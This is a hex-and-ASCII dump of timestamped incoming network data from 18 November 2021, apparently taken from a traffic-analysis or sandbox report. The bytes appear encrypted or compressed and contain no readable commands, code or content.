                                                                                                                                                                                                  2021-11-18 09:30:32 UTC417INData Raw: 28 92 15 e4 5f ad e1 d2 ff e8 95 9a 37 6b b8 0a d3 33 bf 11 33 c1 be 98 b0 be bc cd b3 57 ee 5a ad 9d 1c f4 90 06 5c 72 10 bb 13 b0 3b 6b a7 0a 2f 97 ac 40 d5 20 d1 6a 9e 1c 82 f1 0b a8 c2 10 2f 9d 86 12 d9 be 58 25 72 55 40 f7 39 26 c0 2c 0a a2 a6 34 ef d1 ce e4 09 13 9f 7e a2 85 35 22 25 94 c0 92 64 24 ce 7a 6e d3 32 64 af 30 46 b4 99 e6 b5 05 22 d4 cf f9 52 a3 a6 de bc 6a 31 83 12 ab 30 b7 61 30 31 48 32 25 1e 67 f1 3e d9 f2 4b c7 74 9e 93 6e b7 7a ec 12 93 7a 38 38 bb 54 2d f8 34 54 2d fe 24 4e c2 66 2d c9 3e 15 55 68 35 da 6a bd 3e a5 d9 f2 3b 69 09 c8 4b e7 35 8e 98 2e a8 9d ea da 37 42 33 5c 2e df 24 f0 65 9e dd 4a 1f f2 c0 da 09 19 6f 60 ce 45 6f e1 37 8b d1 e6 b5 ac 16 d4 43 a0 6a 46 e3 4e 56 c5 16 44 5e 14 44 f4 cb bc d2 48 40 6e 1a 4f 0e c6 15
                                                                                                                                                                                                  Data Ascii: (_7k33WZ\r;k/@ j/X%rU@9&,4~5"%d$zn2d0F"Rj10a01H2%g>Ktnzz88T-4T-$Nf->Uh5j>;iK5.7B3\.$eJo`Eo7CjFNVD^DH@nO
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC418INData Raw: 57 b2 1b e7 ca 4d a2 c4 19 6c 37 65 a4 6d 31 40 5b ec af 2c 75 e1 eb 8d 9e a1 44 16 da 9c 27 71 eb f5 37 47 38 58 05 cf c1 f1 1e 69 ed fc 4e 71 c0 94 96 2d d0 f8 96 72 c6 ac 55 a3 54 53 a7 6e a2 34 41 cc 98 2f 72 9d ce 56 23 13 cd c8 d8 e7 46 6b 6f 48 15 1f fc 09 2e fe af 1f 85 4b 26 05 12 fc b4 ba c1 42 d9 d3 c4 73 a5 54 ad 53 91 f2 14 8c 8f 77 a0 6d 9c 5b bf df dd 97 05 0c b6 d1 23 f0 ad a0 20 42 f0 d9 e9 65 c4 f9 89 76 f4 d8 46 a5 9b 0e 9f 2e c5 62 d6 e3 28 1b 93 5a 38 5a 4e ac 10 df 48 d1 82 2c d4 db e2 b3 52 57 89 9d e6 f7 16 dd 26 8c a2 6e 30 7d 25 b3 7a d1 d4 12 78 87 54 05 ff 76 b7 9e e2 2a 28 61 79 ca 19 81 b9 e4 a9 4b 6e a0 b3 de ee 69 bb b9 7c 44 8e 2f 8b e9 a0 73 31 4a 5e e3 6d 1f de e2 11 04 b0 09 cf 18 be a6 fe fe 48 bb 61 7d 81 6b 66 b3 30
                                                                                                                                                                                                  Data Ascii: WMl7em1@[,uD'q7G8XiNq-rUTSn4A/rV#FkoH.K&BsTSwm[# BevF.b(Z8ZNH,RW&n0}%zxTv*(ayKni|D/s1J^mHa}kf0
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC420INData Raw: 67 cd 6c 52 c6 bf 4c 3c 68 5e 35 d8 6c 2b 5b 5c e0 55 39 f3 de 3c 3d e0 43 4b 65 fa 19 77 6a b0 89 f3 b6 96 6e b3 79 48 8d 38 da 0e 8a 34 76 f1 50 35 42 f5 19 cf b5 38 fb e0 5b da f7 f9 ae 07 f4 d0 1c f2 fd 5c 1a 95 18 17 13 61 2b 69 4a 69 81 e3 0f 7c 76 6b 42 67 ac 79 2c ae d4 8e eb aa eb 46 57 c3 a8 fa 5d b1 40 35 12 30 71 21 77 35 53 4a 05 6b f0 87 b1 96 ba d8 f8 24 67 26 4d d0 84 58 a8 08 8e 28 79 67 65 d8 0d 1b 95 f3 d0 9a 04 b2 b8 02 75 b0 21 aa 04 db 74 4d 45 a4 5b 49 2d 92 b8 73 5f 48 6e d6 20 19 fa 5b 07 1d 32 e8 89 6a 19 d6 60 fa 29 18 74 5b 1a d0 5a 7f 5f b1 06 ef 9b ce 28 ce 2c ff f1 23 c2 c0 7f 45 6b ee 71 c2 09 ce 2b 6f de 68 e0 4c 78 35 f7 80 9f c0 58 7f 65 ee bd fb cf 7b bc ed 71 d2 57 53 3f c8 1c 39 7c 1d 57 31 b3 86 b0 11 f2 21 54 61 44
                                                                                                                                                                                                  Data Ascii: glRL<h^5l+[\U9<=CKewjnyH84vP5B8[\a+iJi|vkBgy,FW]@50q!w5SJk$g&MX(ygeu!tME[I-s_Hn [2j`)t[Z_(,#Ekq+ohLx5Xe{qWS?9|W1!TaD
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC421INData Raw: 5e ce f2 f2 4a e7 87 5f 59 f5 ce 7b 50 da 63 5e d9 44 71 1d 28 cf f1 57 20 7f c7 7e 84 57 44 51 7c 08 c6 c6 2b e7 db 70 2b 28 57 70 2a 12 da 3e 35 6f 86 4a d5 6a bb de ed 95 f8 dc 03 86 de 55 36 9a ee 63 e9 b2 58 64 9f 49 26 6b f0 f9 c6 6a f5 4b ab 69 52 91 ab 68 54 b4 e5 38 4d 07 fd a6 8c 3d c2 5c 4f 3d dd 53 32 ad 09 66 b0 72 ab 30 7d 96 9e 6c a7 29 82 29 b1 90 55 3c 07 9f 53 fa 46 35 01 03 bb e6 39 de 62 ae 0c 29 97 ce c1 46 7a 25 26 df 0a 38 c0 57 53 32 57 34 5f b7 90 6d 4f a9 54 d0 45 d9 20 2d 5a 78 fd fa 1d e4 84 33 3d 83 9a 3a 7a 06 0f 08 cb 1d bd c4 6f de 80 3b 4a 8a db 04 7b 5b 39 e4 11 43 96 ac 20 0c 93 27 a1 85 ce 27 d2 3e 36 8f 7b 06 9d 57 c7 c1 ca 6b 9f d9 84 88 b3 5a 47 2e 3a 65 20 ef d0 20 8c 1c 7f 87 1a 96 43 81 82 ec 21 9d bc 23 d5 69 0f
                                                                                                                                                                                                  Data Ascii: ^J_Y{Pc^Dq(W ~WDQ|+p+(Wp*>5oJjU6cXdI&kjKiRhT8M=\O=S2fr0}l))U<SF59b)Fz%&8WS2W4_mOTE -Zx3=:zo;J{[9C ''>6{WkZG.:e C!#i
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC422INData Raw: 41 e6 b9 ee 0e 69 31 f7 72 0b 36 77 14 2e 73 7e de a0 3e 8d bb 1f 17 8b 84 d0 9c c7 3c 9b ea 5e 60 5d 22 93 30 ec 91 25 3a d3 1c 0e 8b 82 a0 cd 33 3f dd 4d d7 ef 4d 48 4b 82 b7 fb ca c6 5b e9 67 2d e0 54 c9 a4 3e 1d 94 81 fa 98 0f 7b 31 9d 8d 4e 88 3e aa c3 6d 1f 48 db 3c 38 5a 88 4c 64 d8 aa 3a 25 71 c7 96 86 b9 68 1d 70 40 bb 3d a1 82 27 3a 3f fe 94 de e0 4d 6e 72 f7 c1 f9 43 4f b8 5f ac 47 81 3c 3f f7 3a 14 60 e2 89 3b 8e f8 f7 ae de f1 35 c0 1a 79 71 e9 ee b8 9f 2f c9 c0 58 ae 88 a7 5f 7d ee 5f a8 f8 f2 4e 5b c4 5b c1 b6 d0 79 1d bb be 1f 15 41 ce f0 1b c2 82 0c c3 cd c0 a9 f8 61 be a3 f8 59 8d 8e 12 ad 00 7a f0 cf 5d 50 1f f3 ed 67 53 a6 8b 9d ee 75 a1 73 4b b2 04 56 fd 5e 10 36 72 ca 9e 33 d2 f5 8a c2 e9 46 76 b1 76 4f b7 be 11 8e e3 58 7a 9b df ae
                                                                                                                                                                                                  Data Ascii: Ai1r6w.s~><^`]"0%:3?MMHK[g-T>{1N>mH<8ZLd:%qhp@=':?MnrCO_G<?:`;5yq/X_}_N[[yAaYz]PgSusKV^6r3FvvOXz
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC424INData Raw: c8 2e cd 43 7d 30 09 ef 5e 4e a5 07 e3 2e fc 07 96 20 2c 50 13 6f 3c 98 f3 b7 93 f2 d0 59 7e c4 f1 df 58 92 31 38 94 7f cb 4e 6f 85 69 3f 91 67 0a 59 42 3f 18 5f c0 e7 d3 fb 45 31 36 b7 8f ff 5b 23 ef 98 66 ef 2e 4a 26 1c 7a 3b 42 c7 09 62 1d 7e dd 76 44 b8 9a fa 80 9b 57 60 d5 32 eb e2 c2 ae 54 77 ec d8 2c e7 eb 9e 26 27 99 3e 79 56 2c 34 e1 fa 5e 68 4b d4 e2 4d b7 ff 9b bd 3f 7e 68 87 41 eb 57 1d d8 50 f4 f7 bd 50 1b 32 54 7f d9 bf d5 32 6b 38 cc ec df 5d 9a 2a c1 38 ec 54 26 5d a3 da 81 ac 40 50 d3 be 3c 58 ce 68 78 cb 6e 6f f5 32 2c ec e7 01 d4 34 4f 1a 2b f6 97 ce 6e b5 5e 49 73 73 e6 72 0a e7 40 20 fd 64 e4 f1 e9 1d 38 50 a6 87 46 33 bb e3 47 a8 e2 3c 89 63 c7 07 b8 62 52 32 41 4e 33 8f b8 72 31 4e 41 55 db d1 a7 c3 33 c0 df 6a 93 31 25 a2 9a c3 af
                                                                                                                                                                                                  Data Ascii: .C}0^N. ,Po<Y~X18Noi?gYB?_E16[#f.J&z;Bb~vDW`2Tw,&'>yV,4^hKM?~hAWPP2T2k8]*8T&]@P<Xhxno2,4O+n^Issr@ d8PF3G<cbR2AN3r1NAU3j1%
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC425INData Raw: 5a 82 93 11 50 e6 a7 e0 23 21 a9 f3 66 38 f6 5f 4e 8a ca 01 f6 1e ba 68 86 ef b7 62 88 5e 7c 52 97 9b e2 fd 0e 98 e6 92 a1 11 6f ab 56 63 16 64 c8 83 c6 a2 c3 5b 84 6a 4b 07 99 c2 56 38 31 c1 6c f2 8b fb 4c af 96 c3 60 74 16 4a 5e f2 b8 da 2c 3d a9 ec 48 48 a9 15 b9 a2 40 c7 0f 93 be 39 81 c0 11 f9 59 74 d3 ea 5d 74 47 8d 24 ca c1 c4 df 31 53 d4 94 21 5b b9 97 01 2d fd 1d a3 ed 69 2c 5f e9 b9 04 15 8c c8 3f 00 17 d9 60 3e 3e 60 50 18 71 c6 2e b9 39 69 12 4c 5a 36 b0 58 64 dc e7 4b 1a 54 de 00 fb 23 8e 75 17 c7 6d 5f 98 e7 68 cb ad ca ec 96 7e 31 3f df 85 d3 58 55 dd 4c 71 5c e9 31 3f ad 77 e0 ab f8 67 de 60 0d c0 9a a8 f8 71 c8 cc 81 dc db 28 6e 4e 2f b3 cb ea ef f0 e3 7b 19 8e 34 81 73 a4 79 3b d7 ac 13 58 e2 b0 80 66 e1 37 ec 44 94 13 78 35 c2 b6 0a 32
                                                                                                                                                                                                  Data Ascii: ZP#!f8_Nhb^|RoVcd[jKV81lL`tJ^,=HH@9Yt]tG$1S![-i,_?`>>`Pq.9iLZ6XdKT#um_h~1?XULq\1?wg`q(nN/{4sy;Xf7Dx52
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC426INData Raw: 60 3d 5f f3 86 dc 52 15 34 56 43 63 e6 5a 21 01 2e b1 d6 13 2d 6f 47 17 3b b9 e6 16 25 27 0b e0 b2 db 58 ac ef 1b 5d 9c f6 92 4d 94 32 12 50 e1 1e e7 0a 55 9b 8d b9 e7 d7 e4 0c d6 c9 26 d6 5f 22 ba d0 bc 34 41 50 10 01 a4 19 e7 25 a5 d4 28 fd 7f fa 9a 89 3e 4e 11 00 bf 1d 89 1b 9f 21 ff fe 9e 3f 07 a7 20 ea ce 3a a6 d6 49 b7 d1 74 e7 0d 5a 2e 49 60 58 fb b4 f0 e4 ec bb a6 41 33 5a 17 ac 9a 29 65 a6 e0 06 33 17 6f af a0 6f a6 9a 90 52 71 23 bc 2e 4a 76 80 52 67 51 4c 5d bd f0 d8 69 5f 2d 0f 59 27 4e 36 df d5 60 ad 04 ce 91 24 25 da 6e d5 bb 2d 87 17 3b a2 b3 4e 3b 68 01 25 65 ee 1a ff 4c 83 76 ce 41 d1 16 ac b2 a5 0e 5e 22 d6 4e 30 04 fe 60 2e 7d fb ff 8b 47 9b 77 4e 1f c8 46 08 6b da 69 46 ec d6 4e d6 66 de 3b 5f 5f 3d 12 23 75 e7 60 8d 04 05 ea f1 aa 71
                                                                                                                                                                                                  Data Ascii: `=_R4VCcZ!.-oG;%'X]M2PU&_"4AP%(>N!? :ItZ.I`XA3Z)e3ooRq#.JvRgQL]i_-Y'N6`$%n-;N;h%eLvA^"N0`.}GwNFkiFNf;__=#u`q
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC427INData Raw: 0f a7 90 0e a4 d7 e6 d8 62 ea 87 74 61 9e 6b 91 8f 17 31 f8 b3 da b0 5b 7d b3 75 45 93 2f 6e 49 0f b6 29 cc 91 70 33 98 3b aa 22 91 67 2e 4d 66 0d 36 fa 87 af 87 7a 4e cf 40 36 46 6b 6e 05 4b e3 53 4c 44 6b 76 05 73 50 ef 36 69 5d 9a 6d 7c a6 d6 c2 1c 4e fa b4 a3 b6 1c 3d 5b 5b e1 98 bb 6a d3 49 66 40 07 2f 94 64 28 60 1f 31 ff 0a de 85 f9 42 58 13 ba bf db 97 c0 40 b8 67 19 24 88 c0 fb 04 d6 64 b7 ca 57 92 bf 8d 7c b3 a3 f0 41 b8 c2 e4 1b c7 cb 33 cd 48 42 66 6c 08 ab 60 9a 1e f2 64 24 d1 7e 24 ef 2c 2e 56 ba 59 e6 eb 5c 89 37 fa 83 81 5f 78 7c 37 e0 cd 0d ff c4 c0 df 5a 60 30 3d a4 c1 7b cd a9 6c 98 8e c0 2e f5 9f 84 44 65 81 90 70 78 d9 59 e4 50 7b ec 78 a3 00 19 68 7c 0a 37 ef 53 5e 09 ea 38 cf 7c 5f 25 ce 64 a4 54 4f 20 4a 7b 74 09 5c 43 87 b2 91 35
                                                                                                                                                                                                  Data Ascii: btak1[}uE/nI)p3;"g.Mf6zN@6FknKSLDkvsP6i]m|N=[[jIf@/d(`1BX@g$dW|A3HBfl`d$~$,.VY\7_x|7Z`0={l.DepxYP{xh|7S^8|_%dTO J{t\C5
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC429INData Raw: c3 0d 82 4e 1b d1 3b ee e6 3a 5c e6 6c 3e c3 94 d6 4f c4 6f 42 38 35 df 6c ca 23 aa c8 30 47 b0 58 3e a7 eb 22 de 82 48 76 0d f0 f8 cc fd 79 d1 97 50 49 42 f8 8a 41 43 af 6c 7d 14 bb a7 6e ae 05 1b cc 7c a6 5c 83 c1 fe ce dd 33 de fa d5 86 bb 73 f6 b9 d7 3d 71 fd ff 30 37 09 bd 4e 48 54 fa 0f 3d c6 57 d7 02 d1 5f 73 1d bb 61 fb 05 ea 8b 1c ea aa 40 5e 9e 0a a5 4f ef 0c a7 c2 83 1d ff 0c 15 ed f0 9f e4 61 84 a5 58 ad ab c3 26 d0 ea 4e f2 52 a2 ac 5d 43 66 6e 53 8e cd 77 a2 77 22 07 da 9b 22 de 83 5a 84 96 f1 57 56 df 08 41 f4 2f 22 4f 6f f3 98 67 25 b5 98 33 3d f4 c2 16 15 bb aa 5c f2 3c 42 43 9a d3 98 b6 1d 48 5f f6 59 59 98 cc 69 3a 27 ef c1 6e af bb d6 87 32 33 fa ca 80 ec dc b3 0d 50 70 52 d6 6d 7e 4e f2 49 94 ea 8f bc 2a 91 db 4b e6 0f 5f 7c 6e 66 34
                                                                                                                                                                                                  Data Ascii: N;:\l>OoB85l#0GX>"HvyPIBACl}n|\3s=q07NHT=W_sa@^OaX&NR]CfnSww""ZWVA/"Oog%3=\<BCH_YYi:'n23PpRm~NI*K_|nf4
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC430INData Raw: 42 e5 7a ce 8b 2a a3 5b bc 70 32 90 67 c3 a9 0d 8b 00 8a c9 cf 5e 7e fd 61 79 65 6a fa 68 93 76 4c 4c 51 b2 32 5d 3f dd 48 40 5d 2a 37 2a 48 26 26 d9 26 6d a2 7a 3d b6 3f 25 4c 2e f1 47 03 d9 50 ff f4 db 28 4a fe 2a 6a 6b a7 2a 53 8d bc c2 2a 77 36 0c ae e8 24 e3 51 14 0e 29 b8 13 33 73 41 36 6a 79 9b fa c0 2d 72 0e 52 e1 3e bf 30 2d 0b 1d 19 23 0b 7f e5 28 6c 34 7b 56 2c cf 96 a2 b3 34 37 03 81 4b 1a 2f 7e 41 34 18 53 4a 3d 25 e6 27 a7 94 0d 11 31 21 ea 17 34 99 96 e3 42 a7 49 59 f0 df 68 24 62 c3 87 48 3b e9 ff 4f ff 29 71 12 e6 e8 8d 7f 7f cf 8c 39 38 28 47 12 69 ce 5c 31 fd f1 d1 54 55 c8 34 be 27 0e 87 cc 9d e7 b2 b0 35 90 a4 bb 6b 5a 33 f5 38 da 57 28 2d fc b8 54 fb 81 8c 55 4d 43 0c 50 45 56 14 5d a8 2d 93 57 79 2f 61 3d ac f6 6f 97 31 d4 6f 3e 41
                                                                                                                                                                                                  Data Ascii: Bz*[p2g^~ayejhvLLQ2]?H@]*7*H&&&mz=?%L.GP(J*jk*S*w6$Q)3sA6jy-rR>0-#(l4{V,47K/~A4SJ=%'1!4BIYh$bH;O)q98(Gi\1TU4'5kZ38W(-TUMCPEV]-Wy/a=o1o>A
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC431INData Raw: e8 3b 24 5a 1f 46 b4 b1 1c 6d 85 75 c1 3f 50 27 d0 47 f8 31 8a af 01 54 41 1d a9 2e bb 3c bf 3b 41 42 38 c8 40 0b bf d8 f2 ed 6a 34 89 c7 12 bc f2 55 c8 4c 7b 60 e2 2c 71 a2 b1 40 79 35 a3 f0 8c 52 0f 30 38 f7 db 6c 33 75 db 59 00 3f 8e 34 fd b9 a5 3a c9 fa d3 3c dd 71 24 e7 27 5c 70 b4 be 9e 0e 27 ee 5f d6 3a ff 25 c3 48 d2 5b d0 7e c5 a5 cb 75 7c 55 24 2c f7 a2 e9 38 65 7f a8 5b 43 b2 21 4f 3a cf 20 38 48 43 c3 6d 11 a9 58 0e c8 99 57 88 42 6b 2b 56 5f 6b e1 96 1b df f7 54 27 38 02 68 fb 60 b7 60 40 59 e1 3a 3a ae f4 73 b8 37 86 af 47 52 a5 36 78 85 ea 3a db 07 89 5e b4 6a 8c 34 81 bd e1 9e 59 0c 53 a2 84 11 07 a6 2f 26 20 40 f3 c5 58 aa 54 a7 6a 44 ff 87 c7 62 4d 70 ac b4 26 50 2c 98 4f 77 5f 44 3b a5 8a 3c 89 e7 b8 33 77 0f f1 cc 02 c6 de 40 b9 07 eb
                                                                                                                                                                                                  Data Ascii: ;$ZFmu?P'G1TA.<;AB8@j4UL{`,q@y5R08l3uY?4:<q$'\p'_:%H[~u|U$,8e[C!O: 8HCmXWBk+V_kT'8h``@Y::s7GR6x:^j4YS/& @XTjDbMp&P,Ow_D;<3w@
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC433INData Raw: fe 5e 0f 3f 62 5f 40 61 be c1 43 31 64 f9 6e 30 63 90 1b 9d 6d 2f 8b 32 7f 84 58 e5 46 6d b8 b6 bf b4 3b 42 50 e1 a5 5b 03 76 e1 99 25 ad e3 05 20 4c 82 fc 78 73 54 4a b2 2e 7d 1a 83 80 f7 4f 43 8f 7d 7b ab 01 65 33 46 a1 65 0f 84 8e ba 85 98 6e dc 12 33 e8 55 55 68 8b 5d 2d 3e b6 0d 34 05 53 94 fd 46 2e 99 32 7f af 88 30 66 90 97 56 a2 92 06 18 5d be 85 f0 9d 6f 94 1a 46 21 92 fb 07 d2 13 c0 bb 2f 17 fa 60 0f 4e 6c f3 ba 23 c1 b0 94 f8 78 db 91 e0 ac 98 70 d7 7a ef 2e f2 74 f7 6d 6b 8d bb 14 b0 0c 77 f1 40 17 d1 0b 4c d9 8a 2e da 43 18 06 1c 32 fe 60 48 70 ec ee 34 35 48 2e 24 3e 47 d9 f6 0b 6f f9 34 8e 73 2e 05 fa af 0a bf e2 4c 32 50 2b af 38 c8 02 27 94 48 36 48 b4 68 f9 77 e8 32 09 2b e5 f9 5b 8d ae 79 40 9b 3a 80 c7 91 33 8f 69 6c 96 ab 5e 99 e1 1b
                                                                                                                                                                                                  Data Ascii: ^?b_@aC1dn0cm/2XFm;BP[v% LxsTJ.}OC}{e3Fen3UUh]->4SF.20fV]oF!/`Nl#xpz.tmkw@L.C2`Hp45H.$>Go4s.L2P+8'H6Hhw2+[y@:3il^
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC434INData Raw: cc 4c f1 90 ae 23 7e 93 7a 4e 7c 42 a4 40 3a 58 db a2 50 e3 2e ad cc a5 f0 39 2f 76 12 c7 42 d6 3b 64 4f 03 f8 e8 77 64 d0 18 37 f8 3b 78 4a 27 c1 4f cc 4b 66 38 d3 ba 2e 3b 55 77 d6 2b 54 4c c0 38 df 70 de 3a 32 5f fd d1 5a 3f 62 4f 43 cc e3 c9 aa b1 2f 38 19 3d 6d 74 82 e2 68 3a 95 42 2c c9 15 cc 6e c6 4d 5b ca 3a ab 4c 80 c8 cb a7 5a 5f d5 9f 72 24 91 81 26 44 2d 51 ee b0 f2 02 53 fa b8 4f 2a 5d 1d 9f d3 69 ee 26 02 f4 3e 55 e4 b4 23 31 80 c8 2c 2f 7a 3f fe 40 de 08 cc f9 6a 14 65 0d 01 91 7b 27 3e 9e 6c c0 de 30 2a 50 e2 42 43 37 ac aa 4a 86 8f 83 58 50 2c 57 69 a4 8e 44 3a 57 fd 72 5f 5e e5 68 5c 8a 53 74 87 9f e4 bf 14 fb bd 8c e4 91 50 cc 50 97 b0 d3 57 a7 de e0 70 39 6a bb cc 04 6e 12 f7 6a e1 c0 0c 39 33 2b 2f 0b a9 44 b5 6a 3e f1 7d 19 a8 f6 fe
                                                                                                                                                                                                  Data Ascii: L#~zN|B@:XP.9/vB;dOwd7;xJ'OKf8.;Uw+TL8p:2_Z?bOC/8=mth:B,nM[:LZ_r$&D-QSO*]i&>U#1,/z?@je{'>l0*PBC7JXP,WiD:Wr_^h\StPPWp9jnj93+/Dj>}
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC435INData Raw: 58 82 17 67 91 7b 3b e2 0f 44 41 cf 3e 01 6a de 25 de 39 26 80 e9 53 37 30 35 9b 05 6c 9b c5 fb 71 f1 6c 9a 8c b8 10 67 00 29 3d 8e 22 70 fa de b8 65 a2 06 37 05 cf 05 bc 9e dc 28 2c d9 91 4a cc 26 97 31 a6 d7 4f a2 64 f7 05 48 c4 f6 e1 04 4e f8 3d 76 e2 0a 6f 9a 5e 7e 76 66 c7 42 9f 38 b3 1e f3 f4 3a fd 87 16 f3 a0 bc 28 8e 50 8b 85 bf ec e1 90 56 19 ca 2c 02 77 02 59 83 e0 4f d4 98 24 df 8b 3a ed e5 2a 4e 59 48 29 38 b5 f7 9c 69 36 6c ca 4c 6b 4a d6 9b 42 bc 82 07 c0 2a 63 fc e2 c7 2c 94 c7 6a de 78 3b 93 fd bf 3d 9e c4 24 dc 42 2c bf a5 5b 3d 12 fa 3d e6 07 7e 32 23 34 ec bb 31 c9 7b b2 62 ec 92 46 2d 30 85 0b 0d 30 5b 6c 3c 71 61 40 28 aa 42 40 86 9c 4f 35 fd 3f 5e cb 53 48 32 37 c1 f4 cf 50 fd 41 4c 43 b7 b0 3b cc d8 bf 08 fb 93 c9 53 b2 aa f0 1d cc
                                                                                                                                                                                                  Data Ascii: Xg{;DA>j%9&S705lqlg)="pe7(,J&1OdHN=vo^~vfB8:(PV,wYO$:*NYH)8i6lLkJB*c,jx;=$B,[==~2#41{bF-00[l<qa@(B@O5?^SH27PALC;S
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC437INData Raw: 39 fc 52 fc b8 87 de 7c ef c7 46 44 1d 90 7a 1e 4e 47 b6 9d 80 10 cc 4d 50 a3 5d 08 cf 20 c1 b8 dd 17 47 cc 2e 4f 46 60 45 50 86 37 34 d3 b1 44 6c a4 d2 2e b5 49 f1 d0 59 4f 62 cf a4 4c 71 b7 d0 df 8e 2c 54 50 40 38 51 db 2f 47 ab b1 de dc 20 57 7e ec 53 5b c7 4d 9c e2 59 5d ce 6b 76 38 17 3d 63 3f 40 bf 20 31 39 5a f2 37 74 57 c2 10 4c 65 56 a0 24 56 f6 56 0e cf de 69 eb 33 f9 33 5e c7 5d cf d7 15 94 14 50 12 3f 62 85 6a 36 90 aa 38 c8 63 c1 83 de 24 c2 ad fc cd 8e 32 de 30 27 bc 90 ec 48 32 2a 38 98 85 e8 56 55 3d 85 a6 67 3e e0 44 59 bd e1 ba 59 53 52 ce 84 6f 05 e2 6d e9 4b 74 51 f6 3e 5b 85 4e 9a 11 67 19 af 90 50 87 ac 7c 70 80 8e ba 4b 32 f4 9b a4 5a be 3a d2 46 7b 8c ef bf b1 67 6e 0b c6 67 dd b6 ef 56 4f d3 4e 67 f7 ba de a0 a3 4f b8 aa aa 47 7e
                                                                                                                                                                                                  Data Ascii: 9R|FDzNGMP] G.OF`EP74Dl.IYObLq,TP@8Q/G W~S[MY]kv8=c?@ 19Z7tWLeV$VVi33^]P?bj68c$20'H2*8VU=g>DYYSRomKtQ>[NgP|pK2Z:F{gngVONgOG~
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC438INData Raw: 83 6b 36 c2 ef 60 82 45 1e 00 a4 6d 7a de b8 54 7b 1c 41 51 ab 32 e5 be ec 92 08 6d ca 4c b2 42 ad 67 48 75 4b e5 b4 3d 0a 8f 08 50 b7 ac 50 78 7a ae f0 50 c3 05 5a 9f 38 da 2c a1 91 b7 cc 50 eb b1 b7 69 5d c1 d7 b8 b6 4a 3a 5e f3 5d e4 a4 db 6a 44 91 04 13 0e a2 31 26 14 e9 07 be bb 73 f0 f9 13 38 3d 26 1f 1f 47 e8 30 4d bd 39 34 79 7f ce 00 9a 6a 3f 5d 95 c8 de e4 29 a0 ce 80 06 03 45 d6 5f 3d 5d ca c5 61 da 1f 6d d9 cf d8 86 37 e9 c0 16 ad 30 7d 31 3d fd 50 5f 3a e5 70 32 6f d2 83 54 40 92 e4 f2 67 99 88 c2 ad a5 07 70 4e 8e 44 d6 a5 e5 a0 3d dc 93 fe cf 4f aa f6 9d 4f 53 bc 8d 10 67 91 7b 31 82 f6 ca 43 25 3c 01 92 da 3a da 2c 12 a2 8d 10 67 44 6c ca 70 68 71 ae 3e 23 70 6a 44 3a f3 a0 bc be f2 15 c6 48 6f 26 0c 7b a9 67 ea 1d 1f a4 ec 30 c9 65 36 69
                                                                                                                                                                                                  Data Ascii: k6`EmzT{AQ2mLBgHuK=PPxzPZ8,Pi]J:^]jD1&s8=&G0M94yj?])E_=]am70}1=P_:p2oT@gpND=OOSg{1C%<:,gDlphq>#pjD:Ho&{g0e6i
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC439INData Raw: 95 44 4c 8f 6d 72 b9 a4 25 30 e5 04 99 12 12 6a e5 a8 3d 9d f0 37 c0 bf fb ae 77 70 53 83 c8 fc 54 f4 eb 4e 42 ba f2 d9 86 7f ec d3 f6 c7 a2 b9 de 4c 57 4f e1 36 17 45 ae 6a dd 42 2c c9 52 d5 ae 44 3e 6b e2 56 e2 86 de 44 c5 50 de 7b 29 76 e2 ec 29 3d 83 8c 0b 4f 5e 63 59 9f a4 c8 50 64 46 7f e1 42 42 bf 50 d7 10 4e 69 61 81 90 68 fc 36 8c 50 ff b6 dc 42 61 52 6e 70 6a 2c e2 50 64 0a 70 69 b9 e1 b9 e4 f0 fb 1c b4 4f c4 45 69 77 fd 60 39 94 3f 5e 69 cf fa 4d 51 4b 5b cf ef 66 3b 48 77 85 36 62 35 4f e5 5c 05 17 87 60 3b a4 aa 17 c8 17 18 60 51 73 de 40 1a 88 fa 71 99 8b b1 48 69 49 de 90 50 5b 6d 67 05 fb b2 0c 2c 8a de ac 50 6b 3e 7f 59 33 eb b0 5f 3d 5d 6f cc 8a c1 c0 d1 79 fb cc f8 bb f1 3a 0e 87 fb 44 a1 90 9e 4c 34 78 c4 4f 43 c8 87 67 5e 4f 62 c9 e2
                                                                                                                                                                                                  Data Ascii: DLmr%0j=7wpSTNBLWO6EjB,RD>kVDP{)v)=O^cYPdFBBPNiah6PBaRnpj,PdpiOEiw`9?^iMQK[f;Hw6b5O\`;`Qs@qHiIP[mg,Pk>Y3_=]oy:DL4xOCg^Ob
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC441INData Raw: 44 dd bd bc 49 5d a0 da 57 79 6c fa 49 29 c6 ba 62 70 63 b1 92 1c 13 b0 40 af dd 2c 25 77 94 3b dd cf 2f e3 b9 fd 01 56 48 a8 61 70 47 43 b9 7d d0 3d eb cb 1c 42 cc 57 c9 da cc 7e b0 1c 62 65 c8 65 d1 07 ef b8 b9 f1 3a a6 10 79 1d bb 14 f7 6e 1e d5 31 ef 6e fa e0 5c 4c 3d 2a 1d 69 e4 30 f7 be cf db 44 81 2b 3c 2d b9 4f ce 6d 1e f4 32 02 5c f9 12 24 42 fc 00 f0 90 b2 e6 f9 63 f0 2d 6e 86 fc 76 fe 1f 0f e2 a3 1c e5 6e ce c0 4a 2c 76 41 57 e4 6c 5c 76 53 9c 84 83 86 dc ee 98 db 1c 50 95 a4 4f 29 66 d8 ad 5c 31 fa 47 43 bf 2e dc c2 60 55 4d b9 b3 40 f0 88 9a 71 54 5c 4f 1e d9 3c 09 b4 53 19 27 de 14 e9 e2 33 47 5c 21 3a 67 88 2b 8f 31 fd 37 e4 b4 f2 1a 5b 74 85 4f c6 11 73 19 27 de 82 a7 28 58 43 32 b4 2d c4 6f de 8d 73 41 70 bf 50 7b 6d aa 80 3a fb 78 c3 77
